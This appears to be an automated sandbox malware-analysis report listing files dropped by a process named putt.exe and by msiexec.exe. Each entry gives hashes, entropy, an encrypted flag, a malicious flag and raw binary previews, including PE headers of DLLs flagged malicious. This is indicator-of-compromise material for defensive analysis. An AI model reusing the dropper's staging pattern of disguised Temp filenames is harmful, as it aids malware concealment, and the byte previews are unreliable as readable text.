                                                                                                                                                                                                                                                  Preview:....."...U(.E.Bx.M.C...;Z0|....U(.E.9G.u.E...A........U(.u..B0;.|x.](.K8;.|@.<.k..P......Y....d"..kC8.P.s(V.Vh......{8.~..s(.p...Y.C0.s(.{8.U.k...C(...kK0..C(.U..T..kK0..C(.U.T...C0.u..M(j.X...u...-..j._......U.......}..-...E..j.X....M.....&..3...E...+.......#...]..E.SP.N..U..'.....3.YY.u.9...."...E..M...+..............](..f;.w0.{...j.[......U..8t.........f;.h...v..](.....j#Xf;.......j.X....>f..t........K...t';.sM.u.......WQ...........t4...4V.q............+.;.w.f;.....u.;U.t.f.F.f;.....t.j.Y..}..t.f.......f#.....f;.u.....>f....t...........3.u...+..f9V....+..f9F....+......u....f....S......j)Xf;.t..r..u........f..u.f9...,...j?Z..*...E.E...*..........*..j.^VR.B.P......U.F}.}........},..}.f..jxXf.r.f.B.f.r..t.......u?.E(j.Y.P .@...;.r*.E(.M...r.j.+H.X....;.u..F.f.B..u..U..r*...U.u..g*..jnXf;.......joXf;.......jpXf;.......jqXf;.........r......jsXf;.........t......j..A.[f;........E.+..E...3....E.E......].f;.u....f9B....*.......f;.M.s......*...E...x....~..E.E....E.....

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Fever

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\putt.exe
                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):76800
                                                                                                                                                                                                                                                  Entropy (8bit):6.686304303605537
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:8Y464qvI932eOypvcLSDOSpZ+Sh+I+FrbCyI7P4Cy:t4qv+32eOyKODOSpQSAU4Cy
                                                                                                                                                                                                                                                  MD5:83828D024D7CAA17F6E52969E845D8E0
                                                                                                                                                                                                                                                  SHA1:FB7538D9D4B604B128828B4CAD2F53CD2195D9C1
                                                                                                                                                                                                                                                  SHA-256:BE0CCB43F0E2AA9090CECE1093DC56131AD5CC655D5CA35A53306CEFCEF56F8E
                                                                                                                                                                                                                                                  SHA-512:41C95DD45EBB805A45CFEB197CACC830F9AC895FB966AC94CC688A206747E9BA3149A7698B1194CD4AD9B7C30CA571FEA115F22D8DF844472BA7E6D1D14782D7
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:[]..U..E...........$...B..u..u..c...YY]..u..u..w.....E..u........P....YY3.].E..u........P.+.....E..u........P.U.....E..u........P.......u........u.j..<...YY3.@].E..u........P."...YYj.X].E..u........P....YYj.....B..B...B...B.+.B.@.B.U.B._.B.p.B...B...V..F......P....F.3.f...F...^.......y..t....j.h....h."J.hx"J.h."J..S....y..u....j.h....h."J.h."J.hL#J........U..M..y..t.....P.u......YY].....3.8M...............]..U...$SV.u.3.W.}.;.w....w....].t..H..........].H.u.... .E.3.@....E....3.J......+.M.+.U.8E..M....H%........E.;.~..u..u..B...YYj.X....3.8E....H%.......;...5....E.H...M.....E.M...........E...@.......H.3.3.@.u...M..E....E......U.E.3.3.@.u..#..E..#...u..]..E.M.#.#.....u...M.8].t..E..U.#.#....t....E...u...t5.i.....t.=....t.=....u..]...8]......8].t.8].u.8].t....M....."u.................t).M...!..;...]...w.;...S....].+].+].K.G....u..u......YYj......M................U..@r..........3..J.@3..t...M.E....E.....U..E.3.3.@.bt..#..E..#...u..]..

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Intro

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\putt.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):88064
                                                                                                                                                                                                                                                  Entropy (8bit):5.541206148230026
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:768:5KPDvFQC7Vkr5M4INduPbOU7aI4kCD9vmPukxhSaAwuXc/mex/S+:58QuklMBNIimuzaAwusPL
                                                                                                                                                                                                                                                  MD5:6689078E7ECA2AE3429263C902005A36
                                                                                                                                                                                                                                                  SHA1:13348F7B86189E5BE3C1CF577235159B797C09BE
                                                                                                                                                                                                                                                  SHA-256:FFDBABA35048B7F354D030F47A9431FA5C752E469B87276075260904A07E08E4
                                                                                                                                                                                                                                                  SHA-512:E18BB61E6858598DF3A132B624A413F9427132222175EDA6E91E1D95479852AFB656D68F15D6321BD08E2910120DD45BB38655CA9AAA748150A4DEA16FB818D9
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:.?.......?.......?.......?.....R.?.....R.?.....$.?.....$.?.......?.......?.......?.......?.......?.......?.....t.?.....t.?.....J.?.....J.?..... .?..... .?.......?.......?.......?.......?.......?.......?.......?.......?.....\.?.....\.?.....6.?.....6.?.......?.......?.......?.......?.......?.......?.......?.......?.......?.......?.....b.?.....b.?.....B.?.....B.?..... .?..... .?.......?.......?..................<....?.N~.'..<..x..z.?...'.*$=...#.f.?.$./...=.@..0..?@A.S..1=..c..E.?.Pa..B==.`..R.?Dj0Q:W$=...>m..?...Lyc>=..*p.%.?...?C;0=...|...?.Ix.".<=.``...?...y.M==..or.O.?..+C..==...v...?.....R1=.PQ....?....b.=.@...P.?.5M[g.?=...V...?d+...[7=.......?n...B.>=. kz.*.?...w.#8=.0.n..?C.#...7=..{....?D.i.00=....f.?.j....-=.x...).?...}z..=. ....?.....0$=.H.V...?....o..=.X...a.?..;.M_8=.@.....?......5=......?.^...@'=..L$...?.../r(=.....<.?.vT.. 3=...?...?..Cg..?=.0....?W/..f.1=.`.(.J.?Dk....0=.h..#..?.@.. .6=......?..._...=...|.D.?.&.?4j<=..'....?Q...n.&=......?.l.....=....6.?..DX.,

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Jamie

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\putt.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):116736
                                                                                                                                                                                                                                                  Entropy (8bit):6.310961115368738
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3072:zg5PXPeiR6MKkjGWoUlJUPdgQa8Bp/LxyA3laW2UT:85vPeDkjGgQaE/loUT
                                                                                                                                                                                                                                                  MD5:0FEF43A1D2F278AD03BB846A85EB2504
                                                                                                                                                                                                                                                  SHA1:1432D6AA98F4C9C45127DB74B5C02365B0B1569A
                                                                                                                                                                                                                                                  SHA-256:5EA9933E7E3138736B9492660E6A83696401F8E6F8041C85B1ECD28D307D5790
                                                                                                                                                                                                                                                  SHA-512:AB2C3BB2BD452FCA44120D6F3914D1E436F1EE85129251CD8CA9F4B4BBE7805E5508905B74D9702E402A0C05285A7E104CD00FFA476C4B7B67B17B4070A55C20
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:......8......../.....................VW......~d...(....~h...0....~D...8....~P...@....>.t..6..<.I..&..u........d)M..U.B.U.;..._....u... .........$.........@)M........t.Q.=.....@)M..... ..5.)M..E.N.5.)M.;.L)M.u...L)M....D)M.........._..^u..5.)M.j.....I..%.)M....D)M...t..@)M..D...8.u..<)M...........U..E.VW.@......P......u..........>3._.F.....^]...U......`.D$.V.u.WP.D$.PV..............L$..@)M..T$..L$........T)M..L$.....8.|$..............'........P............H..............a...WQ.P....7..<.I..t$...D.........d.........h.........P........D$.;F.t.P.....3.@_^..]....L$..N...3...U..V.u.;5t)M.........T)M........t.Q......T)M..... ...`)M...T)M.;5d)M.u....|.....8.u.N...5d)M...X)M.^...v..D...8.t.]...I..X)M.j..4......T)M.YY..X)M..$....X)M....v..T)M...x)M....t)M...T...V..Np......NT....N$....N....h....V.C...YY..^...U..VW.}.........M...tF.E.S..t.;.....uH.^.....Q.........;...a...........h....V......E.YY..t.[j.j..7..X.I._^].....u.........M...t...6..V..j..N..V..F..4......F.YY.N.^.$.

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Legislative

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\putt.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):71389
                                                                                                                                                                                                                                                  Entropy (8bit):7.997603584249478
                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                  SSDEEP:1536:MT2ZVYAoeVFwNjlHzGOVEEHHK/95xfgDpkCijTCGXRz21cvGBY3exC:O2ZVNVFUlHVNHHK/DCzOCGhy1o+9xC
                                                                                                                                                                                                                                                  MD5:205B1F531DC790C74D39A1B682C44A3C
                                                                                                                                                                                                                                                  SHA1:BC5DC0B570F685910CE9122781C30BE7438DAB57
                                                                                                                                                                                                                                                  SHA-256:CBC6F6197C066A563511E6B51F02072FF21ECC3FE41C6DE48CA050C22E0B7B43
                                                                                                                                                                                                                                                  SHA-512:F03FE4176022C356A20AB210813A14D3AE4B8FE59E04AE2708DF6CE4CE28A5C5BA873D936578A13FF339506C7619975B70263451334D16D6F75895188B98AC3A
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:...,.%..Z..Go..4W._.?.F...s..Q\.l^Y...>..b.j.W...7.....w..r<m.2.IV.....W........D.......z.AV.R...0.F-R.....9...<..mo.`..|...}s.I..W...V.e55IR|..Gx.Q.]Cb...]..).IZ....t.]W....]BM.*.C.s... .Y.<.v.b...z..c....Y.2^j.......Fe.....v...Yo....n.......m.....DlU..A.]./...di.L.RK.i.<....=.8.x1...i:.D^>9..j.#V.]u.......ty....U..I.0..>...-....{-M2..AR&.8a..!1.....c-...[.P.OkL8..'...y+Z...n..6o.:%......|v..Ou.3|..i.x......*.5.qO...X..O..D....@..f..%?7U.)..Z..+.C..n*%d<.|...r..{.tY..)....}R...Q...D...4Py......j.......gp....9&....W.....P.w..!....=#..1.....~.<.H-...?.5..B..d$.rmwQ.......(....Dj...y.G....mp.^..J-.P.J...9C.c.......AY.8.I.....Z.....X.5.-.%.r+F.4.xpA.n..A..o ...w;.9]..f.H...R.YF..`.....Q..P .@...O..2[r...."..-...-.^..Xw..7o.O.3..8...k..7P..=lO.0.o..M'..sDy@...2}.....?...9J..\.w...4.'8fd....6;".h...(..-jc.......~.F_...rhc...p.IE}c.).....Q..G-...:z....!.l..R....1.;u....uQ......XY-o....."......c.....0.M..l.7#..z.H.M...=...p2....7..aQ6G.

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\MSIAE63.tmp

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1025128
                                                                                                                                                                                                                                                  Entropy (8bit):6.5991528155295684
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24576:KnknHeDU4dmI6Eepd5TsP1Ih0lhSMXlrcsiG/Ch:6knHeVdOEod5+1d7csiG/Ch
                                                                                                                                                                                                                                                  MD5:DE574F7F5256F98F356A2D620C4A2288
                                                                                                                                                                                                                                                  SHA1:1D57D182BB748170F5CEFB7ECF594B4998E113B8
                                                                                                                                                                                                                                                  SHA-256:E831A5AEBC7BD941FA815A9441E552A0BA699F9BD5454036A68CCBB42200353A
                                                                                                                                                                                                                                                  SHA-512:431F3EA61D23028E1C538AF3C808E7213D629615E3CB22B41D44715FF805323DA82880C35BC90FFFE95621132DAD96EAB5BFCC395863F167664A5666369D0D5B
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|r..8..8..8..H..4..H....(../..(..)..(..w..H.."..H..9..H.....8.....p..B..p..9..p...9..8.y.9..p..9..Rich8..................PE..L....*Xg.........."!...).....d......`........0............................................@A............................L......@....................j..h:..........p\..p....................].......[..@............0...............................text...j........................... ..`.rdata.......0......................@..@.data...@)..........................@....fptable............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\MSIAF01.tmp

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1025128
                                                                                                                                                                                                                                                  Entropy (8bit):6.5991528155295684
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24576:KnknHeDU4dmI6Eepd5TsP1Ih0lhSMXlrcsiG/Ch:6knHeVdOEod5+1d7csiG/Ch
                                                                                                                                                                                                                                                  MD5:DE574F7F5256F98F356A2D620C4A2288
                                                                                                                                                                                                                                                  SHA1:1D57D182BB748170F5CEFB7ECF594B4998E113B8
                                                                                                                                                                                                                                                  SHA-256:E831A5AEBC7BD941FA815A9441E552A0BA699F9BD5454036A68CCBB42200353A
                                                                                                                                                                                                                                                  SHA-512:431F3EA61D23028E1C538AF3C808E7213D629615E3CB22B41D44715FF805323DA82880C35BC90FFFE95621132DAD96EAB5BFCC395863F167664A5666369D0D5B
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|r..8..8..8..H..4..H....(../..(..)..(..w..H.."..H..9..H.....8.....p..B..p..9..p...9..8.y.9..p..9..Rich8..................PE..L....*Xg.........."!...).....d......`........0............................................@A............................L......@....................j..h:..........p\..p....................].......[..@............0...............................text...j........................... ..`.rdata.......0......................@..@.data...@)..........................@....fptable............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\MSIAF50.tmp

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1025128
                                                                                                                                                                                                                                                  Entropy (8bit):6.5991528155295684
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24576:KnknHeDU4dmI6Eepd5TsP1Ih0lhSMXlrcsiG/Ch:6knHeVdOEod5+1d7csiG/Ch
                                                                                                                                                                                                                                                  MD5:DE574F7F5256F98F356A2D620C4A2288
                                                                                                                                                                                                                                                  SHA1:1D57D182BB748170F5CEFB7ECF594B4998E113B8
                                                                                                                                                                                                                                                  SHA-256:E831A5AEBC7BD941FA815A9441E552A0BA699F9BD5454036A68CCBB42200353A
                                                                                                                                                                                                                                                  SHA-512:431F3EA61D23028E1C538AF3C808E7213D629615E3CB22B41D44715FF805323DA82880C35BC90FFFE95621132DAD96EAB5BFCC395863F167664A5666369D0D5B
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|r..8..8..8..H..4..H....(../..(..)..(..w..H.."..H..9..H.....8.....p..B..p..9..p...9..8.y.9..p..9..Rich8..................PE..L....*Xg.........."!...).....d......`........0............................................@A............................L......@....................j..h:..........p\..p....................].......[..@............0...............................text...j........................... ..`.rdata.......0......................@..@.data...@)..........................@....fptable............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\MSIAF80.tmp

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1025128
                                                                                                                                                                                                                                                  Entropy (8bit):6.5991528155295684
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24576:KnknHeDU4dmI6Eepd5TsP1Ih0lhSMXlrcsiG/Ch:6knHeVdOEod5+1d7csiG/Ch
                                                                                                                                                                                                                                                  MD5:DE574F7F5256F98F356A2D620C4A2288
                                                                                                                                                                                                                                                  SHA1:1D57D182BB748170F5CEFB7ECF594B4998E113B8
                                                                                                                                                                                                                                                  SHA-256:E831A5AEBC7BD941FA815A9441E552A0BA699F9BD5454036A68CCBB42200353A
                                                                                                                                                                                                                                                  SHA-512:431F3EA61D23028E1C538AF3C808E7213D629615E3CB22B41D44715FF805323DA82880C35BC90FFFE95621132DAD96EAB5BFCC395863F167664A5666369D0D5B
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|r..8..8..8..H..4..H....(../..(..)..(..w..H.."..H..9..H.....8.....p..B..p..9..p...9..8.y.9..p..9..Rich8..................PE..L....*Xg.........."!...).....d......`........0............................................@A............................L......@....................j..h:..........p\..p....................].......[..@............0...............................text...j........................... ..`.rdata.......0......................@..@.data...@)..........................@....fptable............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\MSIAFB0.tmp

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1025128
                                                                                                                                                                                                                                                  Entropy (8bit):6.5991528155295684
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24576:KnknHeDU4dmI6Eepd5TsP1Ih0lhSMXlrcsiG/Ch:6knHeVdOEod5+1d7csiG/Ch
                                                                                                                                                                                                                                                  MD5:DE574F7F5256F98F356A2D620C4A2288
                                                                                                                                                                                                                                                  SHA1:1D57D182BB748170F5CEFB7ECF594B4998E113B8
                                                                                                                                                                                                                                                  SHA-256:E831A5AEBC7BD941FA815A9441E552A0BA699F9BD5454036A68CCBB42200353A
                                                                                                                                                                                                                                                  SHA-512:431F3EA61D23028E1C538AF3C808E7213D629615E3CB22B41D44715FF805323DA82880C35BC90FFFE95621132DAD96EAB5BFCC395863F167664A5666369D0D5B
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|r..8..8..8..H..4..H....(../..(..)..(..w..H.."..H..9..H.....8.....p..B..p..9..p...9..8.y.9..p..9..Rich8..................PE..L....*Xg.........."!...).....d......`........0............................................@A............................L......@....................j..h:..........p\..p....................].......[..@............0...............................text...j........................... ..`.rdata.......0......................@..@.data...@)..........................@....fptable............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\MSIB1A5.tmp

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1025128
                                                                                                                                                                                                                                                  Entropy (8bit):6.5991528155295684
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24576:KnknHeDU4dmI6Eepd5TsP1Ih0lhSMXlrcsiG/Ch:6knHeVdOEod5+1d7csiG/Ch
                                                                                                                                                                                                                                                  MD5:DE574F7F5256F98F356A2D620C4A2288
                                                                                                                                                                                                                                                  SHA1:1D57D182BB748170F5CEFB7ECF594B4998E113B8
                                                                                                                                                                                                                                                  SHA-256:E831A5AEBC7BD941FA815A9441E552A0BA699F9BD5454036A68CCBB42200353A
                                                                                                                                                                                                                                                  SHA-512:431F3EA61D23028E1C538AF3C808E7213D629615E3CB22B41D44715FF805323DA82880C35BC90FFFE95621132DAD96EAB5BFCC395863F167664A5666369D0D5B
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|r..8..8..8..H..4..H....(../..(..)..(..w..H.."..H..9..H.....8.....p..B..p..9..p...9..8.y.9..p..9..Rich8..................PE..L....*Xg.........."!...).....d......`........0............................................@A............................L......@....................j..h:..........p\..p....................].......[..@............0...............................text...j........................... ..`.rdata.......0......................@..@.data...@)..........................@....fptable............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\MSIB1E4.tmp

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                  Size (bytes):1025128
                                                                                                                                                                                                                                                  Entropy (8bit):6.5991528155295684
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24576:KnknHeDU4dmI6Eepd5TsP1Ih0lhSMXlrcsiG/Ch:6knHeVdOEod5+1d7csiG/Ch
                                                                                                                                                                                                                                                  MD5:DE574F7F5256F98F356A2D620C4A2288
                                                                                                                                                                                                                                                  SHA1:1D57D182BB748170F5CEFB7ECF594B4998E113B8
                                                                                                                                                                                                                                                  SHA-256:E831A5AEBC7BD941FA815A9441E552A0BA699F9BD5454036A68CCBB42200353A
                                                                                                                                                                                                                                                  SHA-512:431F3EA61D23028E1C538AF3C808E7213D629615E3CB22B41D44715FF805323DA82880C35BC90FFFE95621132DAD96EAB5BFCC395863F167664A5666369D0D5B
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|r..8..8..8..H..4..H....(../..(..)..(..w..H.."..H..9..H.....8.....p..B..p..9..p...9..8.y.9..p..9..Rich8..................PE..L....*Xg.........."!...).....d......`........0............................................@A............................L......@....................j..h:..........p\..p....................].......[..@............0...............................text...j........................... ..`.rdata.......0......................@..@.data...@)..........................@....fptable............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Participating

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\putt.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):98304
                                                                                                                                                                                                                                                  Entropy (8bit):7.9977360681233565
                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                  SSDEEP:1536:8KnGbkPNpXFQd4tW9wbuBk5WNJMOcRc+ykpNA9NhJH5Riz4pGLkKtVdEq+loayoX:FJQd4tywoXMVa+9cvhZ5o0plm7+lSijv
                                                                                                                                                                                                                                                  MD5:6B669AEEDE2444CAACAE56D6634856B4
                                                                                                                                                                                                                                                  SHA1:D2F5E1223534F3458B2C537D7F352A7F66ED2E8A
                                                                                                                                                                                                                                                  SHA-256:1D28DBEB808CE4112B273F21EF6F4625F3AD0C99ADC0D5B5FC3BD6CB28D2EA88
                                                                                                                                                                                                                                                  SHA-512:D5D172E91B02B829E8C4BB754C843A69C4B6A34764617505B8C8114F5AE788973673879C017DE1D98D7E47D714DD2BBB512D7BD574349FA2B690384FDB99DEB6
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:...NsRcjh...)H...=.q=+."..q.H..}...=/...=_X?...9U..]Q.d.,.h...G3..X.U.>'...>..#be... ..D.x....$8.@.[.w.5d..H.E.f,8f....R..>4.......-.g...QYQ..Q......./...b.]9.8.......V....\X.Z.FD.5.7....L.v..@.Uv....;..L..DE........d..&{[go.:...b....z........V..V.N..B...:.^.|mBdqj..nn$y.......w=U.P.r...ZA.1.5. u.Y...).7t.....MR?.....}2....LM...,.zUA..]......?.B.........F..(..Q.\.....\....?t).../..p6.?BD...A.A.\..XF....[5.......?%.'...O.">..........V:.zj.'.....6...E`W..W..O.7m....7.?.?.k..c....6...`c".....J....K.1o.!in.Rt0..ekl.....,.(Q!u.v.JX..a.x.......18...........L.N.!o......T........B...2.r..$.}... ^..s...=.)..2.K...Q3`.....R....T:oN.R.<2:`._.....|}.^M.o...I. .8...W.Z....C...i...YU...*..>.:?.'.`....#.@T.,B....V....,.`.5..G_.W....6........4D..Dk..?T..@.....y..-n..[.)$.D.X..y......G2.sF.....Om......t.!..j[...A.^.>.;...6'5P?..A....0.D%%"%.....;..d!.Q..SMm......z.$.......(.AD...]....D[=..TQ,..j.g.#.K`..6...(..."=6sr.<..ak.m.W..e]`.m.w....}.H..g.].m.f.J...H

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Penalties

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\putt.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):2253
                                                                                                                                                                                                                                                  Entropy (8bit):5.210185147584243
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:B9n9mTsCNvEQH5O5U1nPKrhBzM1FoMPhfq1koCqxLV9:rSEA5O5W+MfH5S1CqlV9
                                                                                                                                                                                                                                                  MD5:6FF1E4F807047A9554FED9CF5520B527
                                                                                                                                                                                                                                                  SHA1:B318525BEA237308E47AC9E54A6AAA86C1C0BAF9
                                                                                                                                                                                                                                                  SHA-256:4511CEBD102C965725C9E68CFE398EA6169BD0C0971FC7C083A32A45E1D31AC6
                                                                                                                                                                                                                                                  SHA-512:95F63CDC70E27C1C69DFC324FCDD275C8124EE67C379D3F358C1EC28AB98DE4D77CE37B89CD2A8BFE3D39867B67AC3692C35AE668C10E384A528DAEEBCBFD077
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:Cleared........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B.........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Produced

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\putt.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):59392
                                                                                                                                                                                                                                                  Entropy (8bit):7.996648286668622
                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                  SSDEEP:1536:cBX1dlaX3yjVMLx08/X5KK8FqluzBxXS+fX:+DAX3yCLxZpNeBNrX
                                                                                                                                                                                                                                                  MD5:CC60353BD3E192565DABB8EE57E563EC
                                                                                                                                                                                                                                                  SHA1:08CD358077018723C047DEA1235D04325C24D655
                                                                                                                                                                                                                                                  SHA-256:1EF7F2E0744B21850649B7BE1231AE3DB5548BAAE3E724B2058513B6AEBCA23A
                                                                                                                                                                                                                                                  SHA-512:F13E0CB0C19E6F61B9D4747E57D60614B91D47B8DFE73E5739BC8BF2F180D2E21D801CC8FD4A1E4F3431F0303F1B2350B80450B1CFEC67C0683470D743D17BE4
                                                                                                                                                                                                                                                  Malicious:false
